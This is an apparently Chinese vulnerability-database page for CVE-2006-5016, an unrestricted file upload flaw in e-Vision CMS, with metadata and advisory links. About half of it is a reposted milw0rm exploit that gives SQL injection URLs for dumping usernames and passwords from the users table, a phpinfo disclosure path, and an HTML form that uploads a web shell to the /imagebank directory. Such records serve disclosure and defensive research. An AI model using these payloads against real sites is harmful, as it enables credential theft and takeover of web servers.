Szava Gyula and Csaba Tamas e-Vision CMS 'admin/x_image.php'不受限制的文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115829 漏洞类型 输入验证
发布时间 2008-08-02 更新时间 2008-08-02
CVE编号 CVE-2006-5016 CNNVD-ID CNNVD-200609-478
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/6191
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-478
|漏洞详情
SzavaGyulaandCsabaTamase-VisionCMS可能是1.0版本的admin/x_image.php中的不受限制的文件上传漏洞,远程攻击者将任意文件上传到/imagebank目录中。
|漏洞EXP
#####################################################################################
####              eVision 2.0 Sql Injection/Remote File Upload/IG                ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
#                                                                                   #
#DORK :  :(                                                                           #
#                                                                                   #
#####################################################################################
#                                [Sql Injection]                                    #
#                                                                                   #
#Blind : http://Site/print.php?id=1'+and+1=1/*                                      #
#http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
#User : http://Site/iframe.php?field=username&module=users/*                        #
#Pass : http://Site/iframe.php?field=pass&module=users/*                            #
#                                     [IG]                                          #
#http://Site/admin/phpinfo.php                                                      #
#                                                                                   #
#                               [Remote File Upload]                                #
#Exploit :                                                                          #
#                                                                                   #
#<html>                                                                             #
#<!--                                                                               #
#Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr))                                   # 
#Http://IrCrash.Com                                                                 #
#//-->                                                                              #
#<form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data>
#<input type=file name='file_upload'>                                               #
#<input type=hidden name=insert value=1>                                            #
#<input type=hidden name=s_rc value='file://'>                                      #
#<input type=submit>                                                                #
#</form>                                                                            #
#</html>                                                                            #
#Your shell save in http://Site/imagebank/                                          #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-02]
|参考资料

来源:BID
名称:21047
链接:http://www.securityfocus.com/bid/21047
来源:BUGTRAQ
名称:20060922E-VisionCMSMultibleRemoteinjections
链接:http://www.securityfocus.com/archive/1/archive/1/446706/100/0/threaded
来源:XF
名称:evisioncms-ximage-file-upload(29124)
链接:http://xforce.iss.net/xforce/xfdb/29124
来源:VUPEN
名称:ADV-2006-3764
链接:http://www.frsirt.com/english/advisories/2006/3764
来源:SREASON
名称:1642
链接:http://securityreason.com/securityalert/1642
来源:SECUNIA
名称:21969
链接:http://secunia.com/advisories/21969